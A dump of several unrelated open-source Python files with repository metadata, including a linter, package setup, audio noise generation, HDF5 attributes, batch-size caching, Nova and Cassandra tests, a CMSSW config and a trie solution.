tree = ast.parse(f.read(), filename=filename)
visitor = Visitor(ignore=ignore, allow_dict_kwargs=allow_dict_kwargs)
visitor.visit(tree)
return visitor.builtin_type_calls
def parse_ignore(value: str) -> set[str]:
return set(value.split(','))
def main(argv: Sequence[str] | None = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*')
parser.add_argument('--ignore', type=parse_ignore, default=set())
mutex = parser.add_mutually_exclusive_group(required=False)
mutex.add_argument('--allow-dict-kwargs', action='store_true')
mutex.add_argument(
'--no-allow-dict-kwargs',
dest='allow_dict_kwargs', action='store_false',
)
mutex.set_defaults(allow_dict_kwargs=True)
args = parser.parse_args(argv)
rc = 0
for filename in args.filenames:
calls = check_file(
filename,
ignore=args.ignore,
allow_dict_kwargs=args.allow_dict_kwargs,
)
if calls:
rc = rc or 1
for call in calls:
print(
f'{filename}:{call.line}:{call.column}: '
f'replace {call.name}() with {BUILTIN_TYPES[call.name]}',
)
return rc
if __name__ == '__main__':
raise SystemExit(main())
|
e862fa70f7cc1f43f2f29a5c978aa33e06a1d5d6
|
29eacf3b29753d65d8ec0ab4a60ea1f7ddecbd68
|
/setup.py
|
94d96ef1f119f85d0d5af99f2492c039438445db
|
[
"MIT"
] |
permissive
|
lightly-ai/lightly
|
5b655fe283b7cc2ddf1d7f5bd098603fc1cce627
|
5650ee8d4057139acf8aa10c884d5d5cdc2ccb17
|
refs/heads/master
| 2023-08-17T11:08:00.135920
| 2023-08-16T12:43:02
| 2023-08-16T12:43:02
| 303,705,119
| 2,473
| 229
|
MIT
| 2023-09-14T14:47:16
| 2020-10-13T13:02:56
|
Python
|
UTF-8
|
Python
| false
| false
| 4,985
|
py
|
setup.py
|
import os
import sys
import setuptools
try:
import builtins
except ImportError:
import __builtin__ as builtins
PATH_ROOT = PATH_ROOT = os.path.dirname(__file__)
builtins.__LIGHTLY_SETUP__ = True
import lightly
def load_description(path_dir=PATH_ROOT, filename="DOCS.md"):
"""Load long description from readme in the path_dir/ directory"""
with open(os.path.join(path_dir, filename)) as f:
long_description = f.read()
return long_description
def load_requirements(path_dir=PATH_ROOT, filename="base.txt", comment_char="#"):
"""From pytorch-lightning repo: https://github.com/PyTorchLightning/pytorch-lightning.
Load requirements from text file in the path_dir/requirements/ directory.
"""
with open(os.path.join(path_dir, "requirements", filename), "r") as file:
lines = [ln.strip() for ln in file.readlines()]
reqs = []
for ln in lines:
# filer all comments
if comment_char in ln:
ln = ln[: ln.index(comment_char)].strip()
# skip directly installed dependencies
if ln.startswith("http"):
continue
if ln: # if requirement is not empty
reqs.append(ln)
return reqs
if __name__ == "__main__":
name = "lightly"
version = lightly.__version__
description = lightly.__doc__
author = "Philipp Wirth & Igor Susmelj"
author_email = "philipp@lightly.ai"
description = "A deep learning package for self-supervised learning"
entry_points = {
"console_scripts": [
"lightly-crop = lightly.cli.crop_cli:entry",
"lightly-train = lightly.cli.train_cli:entry",
"lightly-embed = lightly.cli.embed_cli:entry",
"lightly-magic = lightly.cli.lightly_cli:entry",
"lightly-download = lightly.cli.download_cli:entry",
"lightly-version = lightly.cli.version_cli:entry",
]
}
long_description = load_description()
python_requires = ">=3.6"
base_requires = load_requirements(filename="base.txt")
openapi_requires = load_requirements(filename="openapi.txt")
torch_requires = load_requirements(filename="torch.txt")
video_requires = load_requirements(filename="video.txt")
dev_requires = load_requirements(filename="dev.txt")
setup_requires = ["setuptools>=21"]
install_requires = base_requires + openapi_requires + torch_requires
extras_require = {
"video": video_requires,
"dev": dev_requires,
"all": dev_requires + video_requires,
}
packages = [
"lightly",
"lightly.api",
"lightly.cli",
"lightly.cli.config",
"lightly.data",
"lightly.embedding",
"lightly.loss",
"lightly.loss.regularizer",
"lightly.models",
"lightly.models.modules",
"lightly.transforms",
"lightly.utils",
"lightly.utils.benchmarking",
"lightly.utils.cropping",
"lightly.active_learning",
"lightly.active_learning.config",
"lightly.openapi_generated",
"lightly.openapi_generated.swagger_client",
"lightly.openapi_generated.swagger_client.api",
"lightly.openapi_generated.swagger_client.models",
]
project_urls = {
"Homepage": "https://www.lightly.ai",
"Web-App": "https://app.lightly.ai",
"Documentation": "https://docs.lightly.ai",
"Github": "https://github.com/lightly-ai/lightly",
"Discord": "https://discord.gg/xvNJW94",
}
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"License :: OSI Approved :: MIT License",
]
setuptools.setup(
name=name,
version=version,
author=author,
author_email=author_email,
description=description,
entry_points=entry_points,
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
setup_requires=setup_requires,
install_requires=install_requires,
extras_require=extras_require,
python_requires=python_requires,
packages=packages,
classifiers=classifiers,
include_package_data=True,
project_urls=project_urls,
)
|
4c8f326d74f7e5a7f9fe36b38011fc88c6232d34
|
2dfbca22d0bacf7ba2bb4d270b2d3292f5f8a43b
|
/amulet/level/formats/leveldb_world/interface/chunk/leveldb_25.py
|
38432ed45cc5d1f99909ad87a5a9832264eea27c
|
[] |
no_license
|
Amulet-Team/Amulet-Core
|
9715d888e2faf6c41f9414fd105aaa926aa501c2
|
dafef97fe4fd1f2f713ef1e3503d6b13b20c1c1f
|
refs/heads/main
| 2023-08-18T17:45:48.775423
| 2023-08-16T09:37:55
| 2023-08-16T09:37:55
| 130,729,079
| 117
| 26
| null | 2023-08-16T09:37:57
| 2018-04-23T17:00:04
|
Python
|
UTF-8
|
Python
| false
| false
| 673
|
py
|
leveldb_25.py
|
from __future__ import annotations
import struct
from .leveldb_24 import (
LevelDB24Interface as ParentInterface,
)
class LevelDB25Interface(ParentInterface):
chunk_version = 25
@staticmethod
def _chunk_key_to_sub_chunk(cy: int, min_y: int) -> int:
return cy + min_y
@staticmethod
def _get_sub_chunk_storage_byte(cy: int, min_y: int) -> bytes:
# The chunk db keys all start at 0 regardless of chunk floor position.
# This is the floor position of when the world was created.
# If the floor position changes in the future this will break.
return struct.pack("b", cy - min_y)
export = LevelDB25Interface
|
de197ee39eef817704a5936227806c5a45301108
|
09e2c0960db705664881c47cc1c4776289576f04
|
/noisereduce/generate_noise.py
|
d32a0c74bcbb5336d88eff10550660871004e1ad
|
[
"MIT"
] |
permissive
|
timsainb/noisereduce
|
044e5cd513edc04eef8f3cc346e084d2b8fb0a02
|
658b8c61368e2cbc9ed1e86bf71ddf61c77852f0
|
refs/heads/master
| 2023-08-03T09:22:47.124089
| 2023-07-14T03:16:48
| 2023-07-14T03:16:48
| 174,219,582
| 1,066
| 230
|
MIT
| 2023-07-30T18:10:30
| 2019-03-06T20:55:12
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 671
|
py
|
generate_noise.py
|
import numpy as np
# from https://stackoverflow.com/questions/33933842/how-to-generate-noise-in-frequency-range-with-numpy
def fftnoise(f):
"""
"""
f = np.array(f, dtype="complex")
Np = (len(f) - 1) // 2
phases = np.random.rand(Np) * 2 * np.pi
phases = np.cos(phases) + 1j * np.sin(phases)
f[1 : Np + 1] *= phases
f[-1 : -1 - Np : -1] = np.conj(f[1 : Np + 1])
return np.fft.ifft(f).real
def band_limited_noise(min_freq, max_freq, samples=1024, samplerate=1):
freqs = np.abs(np.fft.fftfreq(samples, 1 / samplerate))
f = np.zeros(samples)
f[np.logical_and(freqs >= min_freq, freqs <= max_freq)] = 1
return fftnoise(f)
|
ecd714a4c512619cc7d9ad842510b56cae6eed06
|
9c774a31ff1e98a6366e71e54e84ea97e6f050a2
|
/examples/attributes1.py
|
07096d6b2a7ca09aa6e831f45e5127233e57d88c
|
[
"BSD-3-Clause"
] |
permissive
|
PyTables/PyTables
|
65c355d47d68b5e8f4240fc7cc32906c3b6f2eea
|
f3817d7637b465de1a2ab5da9dffd3aba185c331
|
refs/heads/master
| 2023-08-30T02:46:42.212028
| 2023-08-18T05:32:06
| 2023-08-18T05:32:06
| 1,844,194
| 1,076
| 267
|
BSD-3-Clause
| 2023-09-09T06:56:39
| 2011-06-03T19:44:46
|
Python
|
UTF-8
|
Python
| false
| false
| 636
|
py
|
attributes1.py
|
import numpy as np
import tables as tb
# Open a new empty HDF5 file
fileh = tb.open_file("attributes1.h5", mode="w", title="Testing attributes")
# Get the root group
root = fileh.root
# Create an array
a = np.array([1, 2, 4], np.int32)
# Save it on the HDF5 file
hdfarray = fileh.create_array(root, 'array', a, "Integer array")
# Assign user attributes
# A string
hdfarray.attrs.string = "This is an example"
# A Char
hdfarray.attrs.char = "1"
# An integer
hdfarray.attrs.int = 12
# A float
hdfarray.attrs.float = 12.32
# A generic object
hdfarray.attrs.object = {"a": 32.1, "b": 1, "c": [1, 2]}
# Close the file
fileh.close()
|
2d55d6c2f3e6dd7bbd4384f9623dbeacb6c178ab
|
fff196eb22df71d916c8b7113c28c82c0944ecb8
|
/toma/batchsize_cache.py
|
34aee396d0dd748530e6d8f23c2dcf6b155f2d82
|
[
"MIT"
] |
permissive
|
BlackHC/toma
|
4b48f0f0d84394f493bef19671a3ceb8d88698fd
|
10cfe70efaba59ea669c50c0060cfddef65d0b16
|
refs/heads/master
| 2021-05-26T12:04:44.314625
| 2021-04-17T18:37:20
| 2021-04-17T18:37:20
| 254,126,044
| 343
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,472
|
py
|
batchsize_cache.py
|
import functools
from dataclasses import dataclass
from typing import Optional
import toma.cpu_memory
from toma import stacktrace as tst, torch_cuda_memory as tcm
import weakref
@dataclass
class Batchsize:
value: Optional[int] = None
def set_initial_batchsize(self, initial_batchsize: int):
if not self.value:
self.value = initial_batchsize
def get(self) -> int:
return self.value
def decrease_batchsize(self):
self.value //= 2
assert self.value > 0
class BatchsizeCache:
all_instances = weakref.WeakValueDictionary()
def __init__(self):
stacktrace = tst.get_simple_traceback(2)
BatchsizeCache.all_instances[stacktrace] = self
def get_batchsize(self, initial_batchsize: int) -> Batchsize:
raise NotImplementedError()
@dataclass
class NoBatchsizeCache(BatchsizeCache):
def get_batchsize(self, initial_batchsize: int) -> Batchsize:
return Batchsize(initial_batchsize)
@dataclass
class GlobalBatchsizeCache(BatchsizeCache):
batchsize: Optional[Batchsize] = None
def get_batchsize(self, initial_batchsize: int) -> Batchsize:
if not self.batchsize:
self.batchsize = Batchsize(initial_batchsize)
return self.batchsize
class StacktraceMemoryBatchsizeCache(BatchsizeCache):
LRU_CACHE_SIZE: int = 2 ** 16
MEMORY_GRANULARITY: int = 2 ** 28
TRACK_RAM: bool = True
initial_batchsize: Optional[int]
def __init__(self, lru_cache_size=None):
super().__init__()
self.initial_batchsize = None
@functools.lru_cache(lru_cache_size or StacktraceMemoryBatchsizeCache.LRU_CACHE_SIZE)
def get_batchsize_from_cache(stacktrace, cpu_available_memory, gpu_available_memory):
return Batchsize(self.initial_batchsize)
self.get_batchsize_from_cache = get_batchsize_from_cache
def get_batchsize(self, initial_batchsize: int):
stacktrace = tst.get_simple_traceback(2)
if self.TRACK_RAM:
cpu_available_memory = int(toma.cpu_memory.get_available_cpu_memory() // self.MEMORY_GRANULARITY)
else:
cpu_available_memory = -1
gpu_available_memory = int(tcm.get_cuda_assumed_available_memory() // self.MEMORY_GRANULARITY)
batchsize = self.get_batchsize_from_cache(stacktrace, cpu_available_memory, gpu_available_memory)
batchsize.set_initial_batchsize(initial_batchsize)
return batchsize
|
8c5af51828fa14b3b9830254fdac0595c20e2771
|
84724b34b3f1e84dc53cbca5f3660590dbc34a9f
|
/nova/tests/unit/console/securityproxy/test_rfb.py
|
17cf8f7c5795e67a2fd07e2fabedad622499a692
|
[
"Apache-2.0"
] |
permissive
|
openstack/nova
|
2c24b64e3677595611715bae6dda14edd3f90a24
|
065c5906d2da3e2bb6eeb3a7a15d4cd8d98b35e9
|
refs/heads/master
| 2023-08-28T15:10:05.126314
| 2023-08-25T20:31:27
| 2023-08-25T20:31:27
| 790,031
| 2,287
| 2,320
|
Apache-2.0
| 2023-07-08T02:10:29
| 2010-07-22T02:04:27
|
Python
|
UTF-8
|
Python
| false
| false
| 10,303
|
py
|
test_rfb.py
|
# Copyright (c) 2014-2016 Red Hat, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests the Console Security Proxy Framework."""
from unittest import mock
from nova.console.rfb import auth
from nova.console.rfb import authnone
from nova.console.securityproxy import rfb
from nova import exception
from nova import test
class RFBSecurityProxyTestCase(test.NoDBTestCase):
"""Test case for the base RFBSecurityProxy."""
def setUp(self):
super(RFBSecurityProxyTestCase, self).setUp()
self.manager = mock.Mock()
self.tenant_sock = mock.Mock()
self.compute_sock = mock.Mock()
self.tenant_sock.recv.side_effect = []
self.compute_sock.recv.side_effect = []
self.expected_manager_calls = []
self.expected_tenant_calls = []
self.expected_compute_calls = []
self.proxy = rfb.RFBSecurityProxy()
def _assert_expected_calls(self):
self.assertEqual(self.expected_manager_calls,
self.manager.mock_calls)
self.assertEqual(self.expected_tenant_calls,
self.tenant_sock.mock_calls)
self.assertEqual(self.expected_compute_calls,
self.compute_sock.mock_calls)
def _version_handshake(self):
full_version_str = "RFB 003.008\n"
self._expect_compute_recv(auth.VERSION_LENGTH, full_version_str)
self._expect_compute_send(full_version_str)
self._expect_tenant_send(full_version_str)
self._expect_tenant_recv(auth.VERSION_LENGTH, full_version_str)
def _to_binary(self, val):
if not isinstance(val, bytes):
val = bytes(val, 'utf-8')
return val
def _expect_tenant_send(self, val):
val = self._to_binary(val)
self.expected_tenant_calls.append(mock.call.sendall(val))
def _expect_compute_send(self, val):
val = self._to_binary(val)
self.expected_compute_calls.append(mock.call.sendall(val))
def _expect_tenant_recv(self, amt, ret_val):
ret_val = self._to_binary(ret_val)
self.expected_tenant_calls.append(mock.call.recv(amt))
self.tenant_sock.recv.side_effect = (
list(self.tenant_sock.recv.side_effect) + [ret_val])
def _expect_compute_recv(self, amt, ret_val):
ret_val = self._to_binary(ret_val)
self.expected_compute_calls.append(mock.call.recv(amt))
self.compute_sock.recv.side_effect = (
list(self.compute_sock.recv.side_effect) + [ret_val])
def test_fail(self):
"""Validate behavior for invalid initial message from tenant.
The spec defines the sequence that should be used in the handshaking
process. Anything outside of this is invalid.
"""
self._expect_tenant_send("\x00\x00\x00\x01\x00\x00\x00\x04blah")
self.proxy._fail(self.tenant_sock, None, 'blah')
self._assert_expected_calls()
def test_fail_server_message(self):
"""Validate behavior for invalid initial message from server.
The spec defines the sequence that should be used in the handshaking
process. Anything outside of this is invalid.
"""
self._expect_tenant_send("\x00\x00\x00\x01\x00\x00\x00\x04blah")
self._expect_compute_send("\x00")
self.proxy._fail(self.tenant_sock, self.compute_sock, 'blah')
self._assert_expected_calls()
def test_parse_version(self):
"""Validate behavior of version parser."""
res = self.proxy._parse_version("RFB 012.034\n")
self.assertEqual(12.34, res)
def test_fails_on_compute_version(self):
"""Validate behavior for unsupported compute RFB version.
We only support RFB protocol version 3.8.
"""
for full_version_str in ["RFB 003.007\n", "RFB 003.009\n"]:
self._expect_compute_recv(auth.VERSION_LENGTH, full_version_str)
ex = self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self.assertIn('version 3.8, but server', str(ex))
self._assert_expected_calls()
def test_fails_on_tenant_version(self):
"""Validate behavior for unsupported tenant RFB version.
We only support RFB protocol version 3.8.
"""
full_version_str = "RFB 003.008\n"
for full_version_str_invalid in ["RFB 003.007\n", "RFB 003.009\n"]:
self._expect_compute_recv(auth.VERSION_LENGTH, full_version_str)
self._expect_compute_send(full_version_str)
self._expect_tenant_send(full_version_str)
self._expect_tenant_recv(auth.VERSION_LENGTH,
full_version_str_invalid)
ex = self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self.assertIn('version 3.8, but tenant', str(ex))
self._assert_expected_calls()
def test_fails_on_sec_type_cnt_zero(self):
"""Validate behavior if a server returns 0 supported security types.
This indicates a random issue and the cause of that issues should be
decoded and reported in the exception.
"""
self.proxy._fail = mock.Mock()
self._version_handshake()
self._expect_compute_recv(1, "\x00")
self._expect_compute_recv(4, "\x00\x00\x00\x06")
self._expect_compute_recv(6, "cheese")
self._expect_tenant_send("\x00\x00\x00\x00\x06cheese")
ex = self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self.assertIn('cheese', str(ex))
self._assert_expected_calls()
@mock.patch.object(authnone.RFBAuthSchemeNone, "security_handshake")
def test_full_run(self, mock_handshake):
"""Validate correct behavior."""
new_sock = mock.MagicMock()
mock_handshake.return_value = new_sock
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x01\x02")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x01")
self._expect_compute_send("\x01")
self.assertEqual(new_sock, self.proxy.connect(
self.tenant_sock, self.compute_sock))
mock_handshake.assert_called_once_with(self.compute_sock)
self._assert_expected_calls()
def test_client_auth_invalid_fails(self):
"""Validate behavior if no security types are supported."""
self.proxy._fail = self.manager.proxy._fail
self.proxy.security_handshake = self.manager.proxy.security_handshake
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x01\x02")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x02")
self.expected_manager_calls.append(
mock.call.proxy._fail(
self.tenant_sock, self.compute_sock,
"Only the security type 1 (NONE) is supported",
)
)
self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self._assert_expected_calls()
def test_exception_in_choose_security_type_fails(self):
"""Validate behavior if a given security type isn't supported."""
self.proxy._fail = self.manager.proxy._fail
self.proxy.security_handshake = self.manager.proxy.security_handshake
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x02\x05")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x01")
self.expected_manager_calls.extend([
mock.call.proxy._fail(
self.tenant_sock, self.compute_sock,
'Unable to negotiate security with server')])
self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
self._assert_expected_calls()
@mock.patch.object(authnone.RFBAuthSchemeNone, "security_handshake")
def test_exception_security_handshake_fails(self, mock_auth):
"""Validate behavior if the security handshake fails for any reason."""
self.proxy._fail = self.manager.proxy._fail
self._version_handshake()
self._expect_compute_recv(1, "\x02")
self._expect_compute_recv(2, "\x01\x02")
self._expect_tenant_send("\x01\x01")
self._expect_tenant_recv(1, "\x01")
self._expect_compute_send("\x01")
ex = exception.RFBAuthHandshakeFailed(reason="crackers")
mock_auth.side_effect = ex
self.expected_manager_calls.extend([
mock.call.proxy._fail(self.tenant_sock, None,
'Unable to negotiate security with server')])
self.assertRaises(exception.SecurityProxyNegotiationFailed,
self.proxy.connect,
self.tenant_sock,
self.compute_sock)
mock_auth.assert_called_once_with(self.compute_sock)
self._assert_expected_calls()
|
396eaafa2a34b943de12c5630c7be2e7a7eb98aa
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/L1Trigger/L1TCalorimeter/test/TTbarRelVal_Stage2Test.py
|
8cc14265b76be4b3e36d22cd03a154419cb87b17
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 3,592
|
py
|
TTbarRelVal_Stage2Test.py
|
# Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: l1 -s L1 --pileup=NoPileUp --geometry DB --conditions=auto:startup -n 1 --no_exec --filein=/store/mc/Fall13dr/TT_Tune4C_13TeV-pythia8-tauola/GEN-SIM-RAW/tsg_PU40bx25_POSTLS162_V2-v1/00000/007939EF-8075-E311-B675-0025905938AA.root
import FWCore.ParameterSet.Config as cms
process = cms.Process('L1')
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_38T_cff')
process.load('Configuration.StandardSequences.SimL1Emulator_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
# Input source
process.source = cms.Source("PoolSource",
secondaryFileNames = cms.untracked.vstring(),
fileNames = cms.untracked.vstring('/store/relval/CMSSW_7_3_0_pre1/RelValTTbar_13/GEN-SIM-DIGI-RAW-HLTDEBUG/PU25ns_PRE_LS172_V15-v1/00000/02CB8872-AC5E-E411-BBFD-02163E008CF5.root'
)
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.19 $'),
annotation = cms.untracked.string('l1 nevts:1'),
name = cms.untracked.string('Applications')
)
# Output definition
process.RECOSIMoutput = cms.OutputModule("PoolOutputModule",
splitLevel = cms.untracked.int32(0),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
outputCommands = cms.untracked.vstring("keep *"),#process.RECOSIMEventContent.outputCommands,
fileName = cms.untracked.string('L1.root'),
dataset = cms.untracked.PSet(
filterName = cms.untracked.string(''),
dataTier = cms.untracked.string('')
)
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:startup', '')
# enable debug message logging for our modules
process.MessageLogger = cms.Service(
"MessageLogger",
destinations = cms.untracked.vstring(
'detailedInfo',
'critical'
),
detailedInfo = cms.untracked.PSet(
threshold = cms.untracked.string('DEBUG')
),
debugModules = cms.untracked.vstring(
'l1tCaloStage2Layer1Digis',
'l1tCaloStage2Digis'
)
)
# Raw to digi
process.load('Configuration.StandardSequences.RawToDigi_cff')
# upgrade calo stage 2
process.load('L1Trigger.L1TCalorimeter.L1TCaloStage2_PPFromRaw_cff')
process.load('L1Trigger.L1TCalorimeter.l1tStage2CaloAnalyzer_cfi')
# TTree output file
process.load("CommonTools.UtilAlgos.TFileService_cfi")
process.TFileService.fileName = cms.string('l1t.root')
# Path and EndPath definitions
process.L1simulation_step = cms.Path(
process.ecalDigis
+process.hcalDigis
+process.L1TCaloStage2_PPFromRaw
+process.l1tStage2CaloAnalyzer)
process.RECOSIMoutput_step = cms.EndPath(process.RECOSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.L1simulation_step,
process.RECOSIMoutput_step)
|
74934da18fd1752ab7ba0a9a21bf103c54256a20
|
cd2d902d506e44f6775f8d0e69eb0de745da013e
|
/tests/integration/standard/test_control_connection.py
|
9d579476d29a77d44cbc98492234a5e98be8fc1c
|
[
"Apache-2.0"
] |
permissive
|
datastax/python-driver
|
5135c3dcd227cfaa664d32ce1e0887e71b0e3878
|
8c41066330eb04c34eff57153ab2eda810844d5f
|
refs/heads/master
| 2023-08-18T22:57:43.761208
| 2023-06-06T21:24:28
| 2023-06-06T21:24:28
| 11,262,602
| 1,256
| 492
|
Apache-2.0
| 2023-09-12T21:25:45
| 2013-07-08T19:02:31
|
Python
|
UTF-8
|
Python
| false
| false
| 4,785
|
py
|
test_control_connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
#
#
#
from cassandra import InvalidRequest
import unittest
from cassandra.protocol import ConfigurationException
from tests.integration import use_singledc, PROTOCOL_VERSION, TestCluster, greaterthanorequalcass40, notdse
from tests.integration.datatype_utils import update_datatypes
def setup_module():
use_singledc()
update_datatypes()
class ControlConnectionTests(unittest.TestCase):
def setUp(self):
if PROTOCOL_VERSION < 3:
raise unittest.SkipTest(
"Native protocol 3,0+ is required for UDTs using %r"
% (PROTOCOL_VERSION,))
self.cluster = TestCluster()
def tearDown(self):
try:
self.session.execute("DROP KEYSPACE keyspacetodrop ")
except (ConfigurationException, InvalidRequest):
# we already removed the keyspace.
pass
self.cluster.shutdown()
def test_drop_keyspace(self):
"""
Test to validate that dropping a keyspace with user defined types doesn't kill the control connection.
Creates a keyspace, and populates with a user defined type. It then records the control_connection's id. It
will then drop the keyspace and get the id of the control_connection again. They should be the same. If they are
not dropping the keyspace likely caused the control connection to be rebuilt.
@since 2.7.0
@jira_ticket PYTHON-358
@expected_result the control connection is not killed
@test_category connection
"""
self.session = self.cluster.connect()
self.session.execute("""
CREATE KEYSPACE keyspacetodrop
WITH replication = { 'class' : 'SimpleStrategy', 'replication_factor': '1' }
""")
self.session.set_keyspace("keyspacetodrop")
self.session.execute("CREATE TYPE user (age int, name text)")
self.session.execute("CREATE TABLE mytable (a int PRIMARY KEY, b frozen<user>)")
cc_id_pre_drop = id(self.cluster.control_connection._connection)
self.session.execute("DROP KEYSPACE keyspacetodrop")
cc_id_post_drop = id(self.cluster.control_connection._connection)
self.assertEqual(cc_id_post_drop, cc_id_pre_drop)
def test_get_control_connection_host(self):
"""
Test to validate Cluster.get_control_connection_host() metadata
@since 3.5.0
@jira_ticket PYTHON-583
@expected_result the control connection metadata should accurately reflect cluster state.
@test_category metadata
"""
host = self.cluster.get_control_connection_host()
self.assertEqual(host, None)
self.session = self.cluster.connect()
cc_host = self.cluster.control_connection._connection.host
host = self.cluster.get_control_connection_host()
self.assertEqual(host.address, cc_host)
self.assertEqual(host.is_up, True)
# reconnect and make sure that the new host is reflected correctly
self.cluster.control_connection._reconnect()
new_host = self.cluster.get_control_connection_host()
self.assertNotEqual(host, new_host)
@notdse
@greaterthanorequalcass40
def test_control_connection_port_discovery(self):
"""
Test to validate that the correct port is discovered when peersV2 is used (C* 4.0+).
Unit tests already validate that the port can be picked up (or not) from the query. This validates
it picks up the correct port from a real server and is able to connect.
"""
self.cluster = TestCluster()
host = self.cluster.get_control_connection_host()
self.assertEqual(host, None)
self.session = self.cluster.connect()
cc_endpoint = self.cluster.control_connection._connection.endpoint
host = self.cluster.get_control_connection_host()
self.assertEqual(host.endpoint, cc_endpoint)
self.assertEqual(host.is_up, True)
hosts = self.cluster.metadata.all_hosts()
self.assertEqual(3, len(hosts))
for host in hosts:
self.assertEqual(9042, host.broadcast_rpc_port)
self.assertEqual(7000, host.broadcast_port)
|
2214bc30a65678556b0c832da1999f7a1c5f182b
|
899a427a903148d0d26e903faf8021b94b126911
|
/23-trie/python/0720-longest-word-in-dictionary(看不懂的解答).py
|
2228090bcdf7ec6202aaabe13a66253579ff8765
|
[
"Apache-2.0"
] |
permissive
|
liweiwei1419/LeetCode-Solutions-in-Good-Style
|
033ab69b93fa2d294ab6a08c8b9fbcff6d32a178
|
acc8661338cc7c1ae067915fb16079a9e3e66847
|
refs/heads/master
| 2022-07-27T15:24:57.717791
| 2021-12-19T03:11:02
| 2021-12-19T03:11:02
| 161,101,415
| 2,016
| 351
|
Apache-2.0
| 2022-01-07T10:38:35
| 2018-12-10T01:50:09
|
Java
|
UTF-8
|
Python
| false
| false
| 1,450
|
py
|
0720-longest-word-in-dictionary(看不懂的解答).py
|
from typing import List
class Node:
def __init__(self, key, is_end=False):
self.key = key
self.children = {}
self.is_end = is_end
class Trie:
def __init__(self):
self.root = Node('')
self.root.is_end = True
def insert(self, word):
node = self.root
for alpha in word:
if alpha not in node.children:
node.children[alpha] = Node(alpha)
node = node.children[alpha]
node.is_end = True
class Solution:
def longestWord(self, words: List[str]) -> str:
trie = Trie()
for word in words:
trie.insert(word)
return ''.join(self.__get_word(trie.root))
def __get_word(self, node):
print(node.is_end)
if not node.is_end:
# is_end = False 的时候走到这里
return []
if not node.children:
# 如果 children 是空的时候,走到这里
return [node.key]
# 叶子结点和根结点
li = [self.__get_word(c) for c in node.children.values()]
n = len(max(li, key=len))
print(li)
li = [i for i in li if len(i) == n]
li.sort()
print('debug', node.key, li)
return [node.key] + li[0]
if __name__ == '__main__':
words = ["a", "banana", "app", "appl", "ap", "apply", "apple"]
solution = Solution()
result = solution.longestWord(words)
print(result)
|
9b2c18e9718eda06660bcf0b40cb5e199176f592
|
9ed4d46aedd4d4acadb48d610e940594b5b7b3fd
|
/strings/palindrome.py
|
